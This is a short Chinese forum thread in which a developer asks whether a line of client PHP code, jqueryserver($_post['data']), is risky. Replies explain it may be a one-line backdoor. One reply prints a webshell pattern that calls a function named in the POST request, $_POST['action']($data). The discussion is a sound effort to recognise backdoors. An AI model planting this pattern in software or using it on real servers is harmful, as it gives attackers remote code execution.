jqueryserver($_post[‘data’]); 有风险吗?
資深大佬 : hopboy 7
接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?
jqueryserver($_post[‘data’]);
大佬有話說 (4)
jqueryserver($_post[‘data’]); 有风险吗?
-
資深大佬 : Xusually具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊 -
資深大佬 : imdong然后发现代码如下。
function jqeryserver($data)
{
$_POST[“action”]($data);
} -
資深大佬 : ihipop@imdong 这是一句话木马
-
資深大佬 : msg7086本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……
-